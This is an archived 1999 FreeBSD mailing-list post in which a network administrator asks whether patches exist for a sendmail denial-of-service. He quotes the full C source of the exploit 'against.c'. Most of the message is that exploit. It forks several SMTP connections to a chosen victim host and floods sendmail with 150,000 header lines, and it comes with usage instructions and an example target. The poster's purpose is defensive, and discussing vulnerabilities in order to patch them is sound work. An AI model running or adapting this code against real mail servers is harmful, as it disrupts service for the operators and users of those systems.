Date: Tue, 19 Jan 1999 14:52:56 -0500 From: Mike Tancsa <mike@sentex.net> To: questions@FreeBSD.ORG Subject: latest sendmail DOS Message-ID: <3.0.5.32.19990119145256.02a1a870@staff.sentex.ca>
next in thread | raw e-mail | index | archive | help
Are there any patches available for the Sendmail DOS below ?
Thanks,
---Mike
/*
against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2)
(c) 1999 by <marchew@linux.lepszy.od.kobiety.pl>
Usage: ./against existing_user_on_victim_host victim_host
Example: ./against nobody lamers.net
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <errno.h>
#include <signal.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>
#define MAXCONN 5
#define LINES 150000
struct hostent *hp;
struct sockaddr_in s;
int suck,loop,x;
int main(int argc,char* argv[]) {
printf("against.c - another Sendmail DoS (up to 8.9.2)\n");
if (argc-3) {
printf("Usage: %s victim_user victim_host\n",argv[0]);
exit(0);
}
hp=gethostbyname(argv[2]);
if (!hp) {
perror("gethostbyname");
exit(1);
}
fprintf(stderr,"Doing mess: ");
for (;loop<MAXCONN;loop++) if (!(x=fork())) {
FILE* d;
bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length);
s.sin_family=hp->h_addrtype;
s.sin_port=htons(25);
if ((suck=socket(AF_INET,SOCK_STREAM,0))<0) perror("socket");
if (connect(suck,(struct sockaddr *)&s,sizeof(s))) perror("connect");
if (!(d=fdopen(suck,"w"))) { perror("fdopen"); exit(0); }
usleep(100000);
fprintf(d,"helo tweety\n");
fprintf(d,"mail from: tweety@polbox.com\n");
fprintf(d,"rcpt to: %s@%s\n",argv[1],argv[2]);
fprintf(d,"data\n");
usleep(100000);
for(loop=0;loop<LINES;loop++) {
if (!(loop%100)) fprintf(stderr,".");
fprintf(d,"To: x\n");
}
fprintf(d,"\n\n\nsomedata\n\n\n");
fprintf(d,".\n");
sleep(1);
fprintf(d,"quit\n");
fflush(d);
sleep(100);
shutdown(suck,2);
close(suck);
exit(0);
}
waitpid(x,&loop,0);
fprintf(stderr,"ok\n");
return 0;
}
------------------------------------------------------------------------
Mike Tancsa, tel 01.519.651.3400
Network Administrator, noc@sentex.net
Sentex Communications www.sentex.net
Cambridge, Ontario Canada
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?3.0.5.32.19990119145256.02a1a870>